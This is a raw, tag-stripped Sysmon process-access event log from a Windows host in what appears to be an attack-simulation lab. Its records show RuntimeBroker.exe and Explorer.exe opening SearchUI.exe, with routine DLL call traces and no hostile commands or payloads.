13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 